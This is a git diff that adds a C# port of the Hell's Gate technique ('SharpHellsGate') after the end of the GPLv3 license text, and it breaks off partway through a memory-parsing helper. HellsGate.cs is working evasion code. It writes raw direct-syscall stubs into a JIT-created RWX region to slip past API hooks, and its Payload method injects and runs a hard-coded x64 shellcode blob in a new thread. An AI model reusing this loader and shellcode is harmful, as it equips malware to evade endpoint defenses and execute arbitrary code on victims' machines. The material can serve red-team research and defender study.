License would be to refrain entirely from conveying the Program.
|
||||||
|
|
||||||
|
13. Use with the GNU Affero General Public License.
|
||||||
|
|
||||||
|
Notwithstanding any other provision of this License, you have
|
||||||
|
permission to link or combine any covered work with a work licensed
|
||||||
|
under version 3 of the GNU Affero General Public License into a single
|
||||||
|
combined work, and to convey the resulting work. The terms of this
|
||||||
|
License will continue to apply to the part which is the covered work,
|
||||||
|
but the special requirements of the GNU Affero General Public License,
|
||||||
|
section 13, concerning interaction through a network will apply to the
|
||||||
|
combination as such.
|
||||||
|
|
||||||
|
14. Revised Versions of this License.
|
||||||
|
|
||||||
|
The Free Software Foundation may publish revised and/or new versions of
|
||||||
|
the GNU General Public License from time to time. Such new versions will
|
||||||
|
be similar in spirit to the present version, but may differ in detail to
|
||||||
|
address new problems or concerns.
|
||||||
|
|
||||||
|
Each version is given a distinguishing version number. If the
|
||||||
|
Program specifies that a certain numbered version of the GNU General
|
||||||
|
Public License "or any later version" applies to it, you have the
|
||||||
|
option of following the terms and conditions either of that numbered
|
||||||
|
version or of any later version published by the Free Software
|
||||||
|
Foundation. If the Program does not specify a version number of the
|
||||||
|
GNU General Public License, you may choose any version ever published
|
||||||
|
by the Free Software Foundation.
|
||||||
|
|
||||||
|
If the Program specifies that a proxy can decide which future
|
||||||
|
versions of the GNU General Public License can be used, that proxy's
|
||||||
|
public statement of acceptance of a version permanently authorizes you
|
||||||
|
to choose that version for the Program.
|
||||||
|
|
||||||
|
Later license versions may give you additional or different
|
||||||
|
permissions. However, no additional obligations are imposed on any
|
||||||
|
author or copyright holder as a result of your choosing to follow a
|
||||||
|
later version.
|
||||||
|
|
||||||
|
15. Disclaimer of Warranty.
|
||||||
|
|
||||||
|
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
|
||||||
|
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
|
||||||
|
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
|
||||||
|
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
|
||||||
|
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
|
||||||
|
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
|
||||||
|
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
|
||||||
|
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
|
||||||
|
|
||||||
|
16. Limitation of Liability.
|
||||||
|
|
||||||
|
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
|
||||||
|
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
|
||||||
|
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
|
||||||
|
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
|
||||||
|
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
|
||||||
|
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
|
||||||
|
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
|
||||||
|
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
|
||||||
|
SUCH DAMAGES.
|
||||||
|
|
||||||
|
17. Interpretation of Sections 15 and 16.
|
||||||
|
|
||||||
|
If the disclaimer of warranty and limitation of liability provided
|
||||||
|
above cannot be given local legal effect according to their terms,
|
||||||
|
reviewing courts shall apply local law that most closely approximates
|
||||||
|
an absolute waiver of all civil liability in connection with the
|
||||||
|
Program, unless a warranty or assumption of liability accompanies a
|
||||||
|
copy of the Program in return for a fee.
|
||||||
|
|
||||||
|
END OF TERMS AND CONDITIONS
|
||||||
|
|
||||||
|
How to Apply These Terms to Your New Programs
|
||||||
|
|
||||||
|
If you develop a new program, and you want it to be of the greatest
|
||||||
|
possible use to the public, the best way to achieve this is to make it
|
||||||
|
free software which everyone can redistribute and change under these terms.
|
||||||
|
|
||||||
|
To do so, attach the following notices to the program. It is safest
|
||||||
|
to attach them to the start of each source file to most effectively
|
||||||
|
state the exclusion of warranty; and each file should have at least
|
||||||
|
the "copyright" line and a pointer to where the full notice is found.
|
||||||
|
|
||||||
|
<one line to give the program's name and a brief idea of what it does.>
|
||||||
|
Copyright (C) <year> <name of author>
|
||||||
|
|
||||||
|
This program is free software: you can redistribute it and/or modify
|
||||||
|
it under the terms of the GNU General Public License as published by
|
||||||
|
the Free Software Foundation, either version 3 of the License, or
|
||||||
|
(at your option) any later version.
|
||||||
|
|
||||||
|
This program is distributed in the hope that it will be useful,
|
||||||
|
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
GNU General Public License for more details.
|
||||||
|
|
||||||
|
You should have received a copy of the GNU General Public License
|
||||||
|
along with this program. If not, see <https://www.gnu.org/licenses/>.
|
||||||
|
|
||||||
|
Also add information on how to contact you by electronic and paper mail.
|
||||||
|
|
||||||
|
If the program does terminal interaction, make it output a short
|
||||||
|
notice like this when it starts in an interactive mode:
|
||||||
|
|
||||||
|
<program> Copyright (C) <year> <name of author>
|
||||||
|
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
|
||||||
|
This is free software, and you are welcome to redistribute it
|
||||||
|
under certain conditions; type `show c' for details.
|
||||||
|
|
||||||
|
The hypothetical commands `show w' and `show c' should show the appropriate
|
||||||
|
parts of the General Public License. Of course, your program's commands
|
||||||
|
might be different; for a GUI interface, you would use an "about box".
|
||||||
|
|
||||||
|
You should also get your employer (if you work as a programmer) or school,
|
||||||
|
if any, to sign a "copyright disclaimer" for the program, if necessary.
|
||||||
|
For more information on this, and how to apply and follow the GNU GPL, see
|
||||||
|
<https://www.gnu.org/licenses/>.
|
||||||
|
|
||||||
|
The GNU General Public License does not permit incorporating your program
|
||||||
|
into proprietary programs. If your program is a subroutine library, you
|
||||||
|
may consider it more useful to permit linking proprietary applications with
|
||||||
|
the library. If this is what you want to do, use the GNU Lesser General
|
||||||
|
Public License instead of this License. But first, please read
|
||||||
|
<https://www.gnu.org/licenses/why-not-lgpl.html>.
|
11
Hells Gate/C# Implementation/README.md
Normal file
11
Hells Gate/C# Implementation/README.md
Normal file
@ -0,0 +1,11 @@
|
|||||||
|
## C# Hell's Gate ##
|
||||||
|
C# Implementation of the Hell's Gate VX Technique
|
||||||
|
<br />
|
||||||
|
<br />
|
||||||
|
Link to the paper: https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf
|
||||||
|
<br /> PDF also included in this repository.
|
||||||
|
<br />
|
||||||
|
<br />
|
||||||
|
Link to the original C implementation: https://github.com/am0nsec/HellsGate
|
||||||
|
<br />
|
||||||
|
<br />
|
25
Hells Gate/C# Implementation/SharpHellsGate.sln
Normal file
25
Hells Gate/C# Implementation/SharpHellsGate.sln
Normal file
@ -0,0 +1,25 @@
|
|||||||
|
|
||||||
|
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||||
|
# Visual Studio Version 16
|
||||||
|
VisualStudioVersion = 16.0.30114.105
|
||||||
|
MinimumVisualStudioVersion = 10.0.40219.1
|
||||||
|
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpHellsGate", "SharpHellsGate\SharpHellsGate.csproj", "{F6A46854-FDC2-4F27-9051-5C7BE8E68733}"
|
||||||
|
EndProject
|
||||||
|
Global
|
||||||
|
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||||
|
Debug|Any CPU = Debug|Any CPU
|
||||||
|
Release|Any CPU = Release|Any CPU
|
||||||
|
EndGlobalSection
|
||||||
|
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||||
|
{F6A46854-FDC2-4F27-9051-5C7BE8E68733}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
||||||
|
{F6A46854-FDC2-4F27-9051-5C7BE8E68733}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
||||||
|
{F6A46854-FDC2-4F27-9051-5C7BE8E68733}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
||||||
|
{F6A46854-FDC2-4F27-9051-5C7BE8E68733}.Release|Any CPU.Build.0 = Release|Any CPU
|
||||||
|
EndGlobalSection
|
||||||
|
GlobalSection(SolutionProperties) = preSolution
|
||||||
|
HideSolutionNode = FALSE
|
||||||
|
EndGlobalSection
|
||||||
|
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||||
|
SolutionGuid = {CA2A2F5F-A135-4771-A014-A6F2C0D24538}
|
||||||
|
EndGlobalSection
|
||||||
|
EndGlobal
|
278
Hells Gate/C# Implementation/SharpHellsGate/HellsGate.cs
Normal file
278
Hells Gate/C# Implementation/SharpHellsGate/HellsGate.cs
Normal file
@ -0,0 +1,278 @@
|
|||||||
|
using System;
|
||||||
|
using SharpHellsGate.Win32;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
using System.Collections.Generic;
|
||||||
|
using System.Reflection;
|
||||||
|
using System.Runtime.CompilerServices;
|
||||||
|
|
||||||
|
namespace SharpHellsGate {
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Main implementation of the Hell's Gate technique.
|
||||||
|
/// Responsible for generating a RWX memory region, inject and execute system call stubs.
|
||||||
|
/// </summary>
|
||||||
|
public class HellsGate {
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Used to check if the RWX memory region was generated.
|
||||||
|
/// </summary>
|
||||||
|
private bool IsGateReady { get; set; } = false;
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Used as for mutual exclusion while injecting and execution of the system call stub in memory.
|
||||||
|
/// </summary>
|
||||||
|
private object Mutant { get; set; } = new object();
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
///
|
||||||
|
/// </summary>
|
||||||
|
private Dictionary<UInt64, Util.APITableEntry> APITable { get; set; } = new Dictionary<ulong, Util.APITableEntry>() { };
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Address of the managed method that was JIT'ed.
|
||||||
|
/// </summary>
|
||||||
|
private IntPtr MangedMethodAddress { get; set; } = IntPtr.Zero;
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Address of the RWX memory region after JIT compiling the managed method.
|
||||||
|
/// </summary>
|
||||||
|
private IntPtr UnmanagedMethodAddress { get; set; } = IntPtr.Zero;
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// This function will be JIT at runtime to create RWX memory region.
|
||||||
|
/// </summary>
|
||||||
|
//// <returns>Gate returns either STATUS_SUCCESS or an error status code.</returns>
|
||||||
|
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
|
||||||
|
private static UInt32 Gate() {
|
||||||
|
return new UInt32();
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Inject in memory a basic system call stub and return a delegate for execution via un-managed code.
|
||||||
|
/// </summary>
|
||||||
|
/// <typeparam name="T">The desired delegate Type.</typeparam>
|
||||||
|
/// <param name="syscall">The system call to execute.</param>
|
||||||
|
/// <returns>A delegate of to execute the system call.</returns>
|
||||||
|
private T NtInvocation<T>(Int16 syscall) where T: Delegate {
|
||||||
|
if (!this.IsGateReady || this.UnmanagedMethodAddress == IntPtr.Zero) {
|
||||||
|
Util.LogError("Unable to inject system call stub");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
Span<byte> stub = stackalloc byte[24] {
|
||||||
|
0x4c, 0x8b, 0xd1, // mov r10, rcx
|
||||||
|
0xb8, (byte)syscall, (byte)(syscall >> 8), 0x00, 0x00, // mov eax, <syscall
|
||||||
|
0xf6, 0x04, 0x25, 0x08, 0x03, 0xfe, 0x7f, 0x01, // test byte ptr [SharedUserData+0x308],1
|
||||||
|
0x75, 0x03, // jne ntdll!<function>+0x15
|
||||||
|
0x0f, 0x05, // syscall
|
||||||
|
0xc3, // ret
|
||||||
|
0xcd, 0x2e, // int 2Eh
|
||||||
|
0xc3 // ret
|
||||||
|
};
|
||||||
|
|
||||||
|
Marshal.Copy(stub.ToArray(), 0, this.UnmanagedMethodAddress, stub.Length);
|
||||||
|
return Marshal.GetDelegateForFunctionPointer<T>(this.UnmanagedMethodAddress);
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Managed wrapper around the NtAllocateVirtualMemory native Windows function
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="ProcessHandle">A handle for the process for which the mapping should be done.</param>
|
||||||
|
/// <param name="BaseAddress">A pointer to a variable that will receive the base address of the allocated region of pages.</param>
|
||||||
|
/// <param name="ZeroBits">The number of high-order address bits that must be zero in the base address of the section view.</param>
|
||||||
|
/// <param name="RegionSize">A pointer to a variable that will receive the actual size, in bytes, of the allocated region of pages.</param>
|
||||||
|
/// <param name="AllocationType">A bitmask containing flags that specify the type of allocation to be performed for the specified region of pages.</param>
|
||||||
|
/// <param name="Protect">A bitmask containing page protection flags that specify the protection desired for the committed region of pages.</param>
|
||||||
|
/// <returns>NtAllocateVirtualMemory returns either STATUS_SUCCESS or an error status code.</returns>
|
||||||
|
private UInt32 NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize, UInt32 AllocationType, UInt32 Protect) {
|
||||||
|
lock (this.Mutant) {
|
||||||
|
Int16 syscall = this.APITable[Util.NtAllocateVirtualMemoryHash].Syscall;
|
||||||
|
if (syscall == 0x0000)
|
||||||
|
return Macros.STATUS_UNSUCCESSFUL;
|
||||||
|
|
||||||
|
DFunctions.NtAllocateVirtualMemory Func = NtInvocation<DFunctions.NtAllocateVirtualMemory>(syscall);
|
||||||
|
return Func(ProcessHandle, ref BaseAddress, ZeroBits, ref RegionSize, AllocationType, Protect);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Managed wrapper around the NtProtectVirtualMemory native Windows function.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="ProcessHandle">Handle to Process Object opened with PROCESS_VM_OPERATION access.</param>
|
||||||
|
/// <param name="BaseAddress">Pointer to base address to protect. Protection will change on all page containing specified address. On output, BaseAddress will point to page start address.</param>
|
||||||
|
/// <param name="NumberOfBytesToProtect">Pointer to size of region to protect. On output will be round to page size (4KB).</param>
|
||||||
|
/// <param name="NewAccessProtection">One or some of PAGE_... attributes.</param>
|
||||||
|
/// <param name="OldAccessProtection">Receive previous protection.</param>
|
||||||
|
/// <returns>NtProtectVirtualMemory returns either STATUS_SUCCESS or an error status code.</returns>
|
||||||
|
private UInt32 NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr NumberOfBytesToProtect, UInt32 NewAccessProtection, ref UInt32 OldAccessProtection) {
|
||||||
|
lock (this.Mutant) {
|
||||||
|
Int16 syscall = this.APITable[Util.NtProtectVirtualMemoryHash].Syscall;
|
||||||
|
if (syscall == 0x0000)
|
||||||
|
return Macros.STATUS_UNSUCCESSFUL;
|
||||||
|
|
||||||
|
DFunctions.NtProtectVirtualMemory Func = NtInvocation<DFunctions.NtProtectVirtualMemory>(syscall);
|
||||||
|
return Func(ProcessHandle, ref BaseAddress, ref NumberOfBytesToProtect, NewAccessProtection, out OldAccessProtection);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Managed wrapper around the NtCreateThreadEx native Windows function.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="hThread">Caller supplied storage for the resulting handle.</param>
|
||||||
|
/// <param name="DesiredAccess">Specifies the allowed or desired access to the thread.</param>
|
||||||
|
/// <param name="ObjectAttributes">Initialized attributes for the object.</param>
|
||||||
|
/// <param name="ProcessHandle">Handle to the threads parent process.</param>
|
||||||
|
/// <param name="lpStartAddress">Address of the function to execute.</param>
|
||||||
|
/// <param name="lpParameter">Parameters to pass to the function.</param>
|
||||||
|
/// <param name="CreateSuspended">Whether the thread will be in suspended mode and has to be resumed later.</param>
|
||||||
|
/// <param name="StackZeroBits"></param>
|
||||||
|
/// <param name="SizeOfStackCommit">Initial stack memory to commit.</param>
|
||||||
|
/// <param name="SizeOfStackReserve">Initial stack memory to reserve.</param>
|
||||||
|
/// <param name="lpBytesBuffer"></param>
|
||||||
|
/// <returns>NtCreateThreadEx returns either STATUS_SUCCESS or an error status code.</returns>
|
||||||
|
private UInt32 NtCreateThreadEx(ref IntPtr hThread, uint DesiredAccess, IntPtr ObjectAttributes, IntPtr ProcessHandle, IntPtr lpStartAddress, IntPtr lpParameter, bool CreateSuspended, uint StackZeroBits, uint SizeOfStackCommit, uint SizeOfStackReserve, IntPtr lpBytesBuffer) {
|
||||||
|
lock (this.Mutant) {
|
||||||
|
Int16 syscall = this.APITable[Util.NtCreateThreadExHash].Syscall;
|
||||||
|
if (syscall == 0x0000)
|
||||||
|
return Macros.STATUS_UNSUCCESSFUL;
|
||||||
|
|
||||||
|
DFunctions.NtCreateThreadEx Func = NtInvocation<DFunctions.NtCreateThreadEx>(syscall);
|
||||||
|
return Func(ref hThread, DesiredAccess, ObjectAttributes, ProcessHandle, lpStartAddress, lpParameter, CreateSuspended, StackZeroBits, SizeOfStackCommit, SizeOfStackReserve, lpBytesBuffer);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Managed wrapper around the NtWaitForSingleObject native Windows function.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="ObjectHandle">Open handle to a alertable executive object.</param>
|
||||||
|
/// <param name="Alertable">If set, calling thread is signaled, so all queued APC routines are executed.</param>
|
||||||
|
/// <param name="TimeOuts">Time-out interval, in microseconds. NULL means infinite.</param>
|
||||||
|
/// <returns>NtWaitForSingleObject returns either STATUS_SUCCESS or an error status code.</returns>
|
||||||
|
private UInt32 NtWaitForSingleObject(IntPtr ObjectHandle, bool Alertable, ref Structures.LARGE_INTEGER TimeOuts) {
|
||||||
|
lock (this.Mutant) {
|
||||||
|
Int16 syscall = this.APITable[Util.NtWaitForSingleObjectHash].Syscall;
|
||||||
|
if (syscall == 0x0000)
|
||||||
|
return Macros.STATUS_UNSUCCESSFUL;
|
||||||
|
|
||||||
|
DFunctions.NtWaitForSingleObject Func = NtInvocation<DFunctions.NtWaitForSingleObject>(syscall);
|
||||||
|
return Func(ObjectHandle, Alertable, ref TimeOuts);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// .ctor
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="Table">The API table that will be used by the multiple function wrapers.</param>
|
||||||
|
public HellsGate(Dictionary<UInt64, Util.APITableEntry> Table) {
|
||||||
|
this.APITable = Table;
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// JIT a static method to generate RWX memory segment.
|
||||||
|
/// </summary>
|
||||||
|
/// <returns>Whether the memory segment was successfully generated.</returns>
|
||||||
|
public bool GenerateRWXMemorySegment() {
|
||||||
|
// Find and JIT the method
|
||||||
|
MethodInfo method = typeof(HellsGate).GetMethod(nameof(Gate), BindingFlags.Static | BindingFlags.NonPublic);
|
||||||
|
if (method == null) {
|
||||||
|
Util.LogError("Unable to find the method");
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
RuntimeHelpers.PrepareMethod(method.MethodHandle);
|
||||||
|
|
||||||
|
// Get the address of the function and check if first opcode == JMP
|
||||||
|
IntPtr pMethod = method.MethodHandle.GetFunctionPointer();
|
||||||
|
if (Marshal.ReadByte(pMethod) != 0xe9) {
|
||||||
|
Util.LogError("Method was not JIT'ed or invalid stub");
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
Util.LogInfo($"Managed method address: 0x{pMethod:x16}");
|
||||||
|
|
||||||
|
// Get address of jited method and stack alignment
|
||||||
|
Int32 offset = Marshal.ReadInt32(pMethod, 1);
|
||||||
|
UInt64 addr = (UInt64)pMethod + (UInt64)offset;
|
||||||
|
while (addr % 16 != 0)
|
||||||
|
addr++;
|
||||||
|
Util.LogInfo($"Unmanaged method address: 0x{addr:x16}\n");
|
||||||
|
|
||||||
|
this.MangedMethodAddress = method.MethodHandle.GetFunctionPointer();
|
||||||
|
this.UnmanagedMethodAddress = (IntPtr)addr;
|
||||||
|
this.IsGateReady = true;
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Payload example. In this case this is a basic shellcode self-injection.
|
||||||
|
/// </summary>
|
||||||
|
public void Payload() {
|
||||||
|
if (!this.IsGateReady) {
|
||||||
|
if (!this.GenerateRWXMemorySegment()) {
|
||||||
|
Util.LogError("Unable to generate RX memory segment");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
byte[] shellcode = new byte[273] {
|
||||||
|
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
|
||||||
|
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
|
||||||
|
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
|
||||||
|
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
|
||||||
|
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
|
||||||
|
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
|
||||||
|
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
|
||||||
|
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
|
||||||
|
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
|
||||||
|
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
|
||||||
|
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
|
||||||
|
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
|
||||||
|
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
|
||||||
|
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
|
||||||
|
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
|
||||||
|
0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
|
||||||
|
0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
|
||||||
|
0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
|
||||||
|
0x63,0x00,0xc3
|
||||||
|
};
|
||||||
|
Util.LogInfo($"Shellcode size: {shellcode.Length} bytes");
|
||||||
|
|
||||||
|
// Allocate Memory
|
||||||
|
IntPtr pBaseAddres = IntPtr.Zero;
|
||||||
|
IntPtr Region = (IntPtr)shellcode.Length;
|
||||||
|
UInt32 ntstatus = NtAllocateVirtualMemory(Macros.GetCurrentProcess(), ref pBaseAddres, IntPtr.Zero, ref Region, Macros.MEM_COMMIT | Macros.MEM_RESERVE, Macros.PAGE_READWRITE);
|
||||||
|
if (!Macros.NT_SUCCESS(ntstatus)) {
|
||||||
|
Util.LogError($"Error ntdll!NtAllocateVirtualMemory (0x{ntstatus:0x8})");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
Util.LogInfo($"Page address: 0x{pBaseAddres:x16}");
|
||||||
|
|
||||||
|
// Copy Memory
|
||||||
|
Marshal.Copy(shellcode, 0, pBaseAddres, shellcode.Length);
|
||||||
|
Array.Clear(shellcode, 0, shellcode.Length);
|
||||||
|
|
||||||
|
// Change memory protection
|
||||||
|
UInt32 OldAccessProtection = 0;
|
||||||
|
ntstatus = NtProtectVirtualMemory(Macros.GetCurrentProcess(), ref pBaseAddres, ref Region, Macros.PAGE_EXECUTE_READ, ref OldAccessProtection);
|
||||||
|
if (!Macros.NT_SUCCESS(ntstatus) || OldAccessProtection != 0x0004) {
|
||||||
|
Util.LogError($"Error ntdll!NtProtectVirtualMemory (0x{ntstatus:0x8})");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
IntPtr hThread = IntPtr.Zero;
|
||||||
|
ntstatus = NtCreateThreadEx(ref hThread, 0x1FFFFF, IntPtr.Zero, Macros.GetCurrentProcess(), pBaseAddres, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);
|
||||||
|
if (!Macros.NT_SUCCESS(ntstatus) || hThread == IntPtr.Zero) {
|
||||||
|
Util.LogError($"Error ntdll!NtCreateThreadEx (0x{ntstatus:0x8})");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
Util.LogInfo($"Thread handle: 0x{hThread:x16}\n");
|
||||||
|
|
||||||
|
// Wait for one second
|
||||||
|
Structures.LARGE_INTEGER TimeOut = new Structures.LARGE_INTEGER();
|
||||||
|
TimeOut.QuadPart = -10000000;
|
||||||
|
ntstatus = NtWaitForSingleObject(hThread, false, ref TimeOut);
|
||||||
|
if (ntstatus != 0x00) {
|
||||||
|
Util.LogError($"Error ntdll!NtWaitForSingleObject (0x{ntstatus:0x8})");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
142
Hells Gate/C# Implementation/SharpHellsGate/Module/MemoryUtil.cs
Normal file
142
Hells Gate/C# Implementation/SharpHellsGate/Module/MemoryUtil.cs
Normal file
@ -0,0 +1,142 @@
|
|||||||
|
using System;
|
||||||
|
using System.IO;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
using System.Text;
|
||||||
|
|
||||||
|
namespace SharpHellsGate.Module {
|
||||||
|
/// <summary>
|
||||||
|
/// Used to manipulate and extract information from a memory stream.
|
||||||
|
/// In this case the memory stream is the NTDLL module.
|
||||||
|
/// </summary>
|
||||||
|
public class MemoryUtil : IDisposable {
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// The memory stream representation of the NTDLL module.
|
||||||
|
/// </summary>
|
||||||
|
protected Stream ModuleStream { get; set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Dispose the memory stream when no longer needed.
|
||||||
|
/// </summary>
|
||||||
|
~MemoryUtil() => Dispose();
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Dispose the memory stream when no longer needed.
|
||||||
|
/// </summary>
|
||||||
|
public void Dispose() {
|
||||||
|
this.ModuleStream.Dispose();
|
||||||
|
this.ModuleStream.Close();
|
||||||
|
GC.SuppressFinalize(this);
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Extract a structure from the memory stream.
|
||||||
|
/// </summary>
|
||||||
|
/// <typeparam name="T">The Type of the structure to extract.</typeparam>
|
||||||
|
/// <param name="offset">The offset in the memory stream where the structure is located.</param>
|
||||||
|
/// <returns>The structure populated or the default structure.</returns>
|
||||||
|
protected T GetStructureFromBlob<T>(Int64 offset) where T : struct {
|
||||||
|
Span<byte> bytes = this.GetStructureBytesFromOffset<T>(offset);
|
||||||
|
if (Marshal.SizeOf<T>() != bytes.Length)
|
||||||
|
return default;
|
||||||
|
|
||||||
|
IntPtr ptr = Marshal.AllocHGlobal(Marshal.SizeOf<T>());
|
||||||
|
Marshal.Copy(bytes.ToArray(), 0, ptr, bytes.Length);
|
||||||
|
T s = Marshal.PtrToStructure<T>(ptr);
|
||||||
|
|
||||||
|
Marshal.FreeHGlobal(ptr);
|
||||||
|
return s;
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Extract the code from a native Windows function.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="offset">The location of the function in the memory stream.</param>
|
||||||
|
/// <returns>The 24 bytes representing the code of the function.</returns>
|
||||||
|
protected Span<byte> GetFunctionOpCode(Int64 offset) {
|
||||||
|
Span<byte> s = stackalloc byte[24];
|
||||||
|
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||||
|
this.ModuleStream.Read(s);
|
||||||
|
return s.ToArray();
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Extract a DWORD value from the memory stream.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="offset">The location of the DWORD in the memory stream.</param>
|
||||||
|
/// <returns>The value of the DWORD.</returns>
|
||||||
|
protected UInt32 ReadPtr32(Int64 offset) {
|
||||||
|
Span<byte> s = stackalloc byte[4];
|
||||||
|
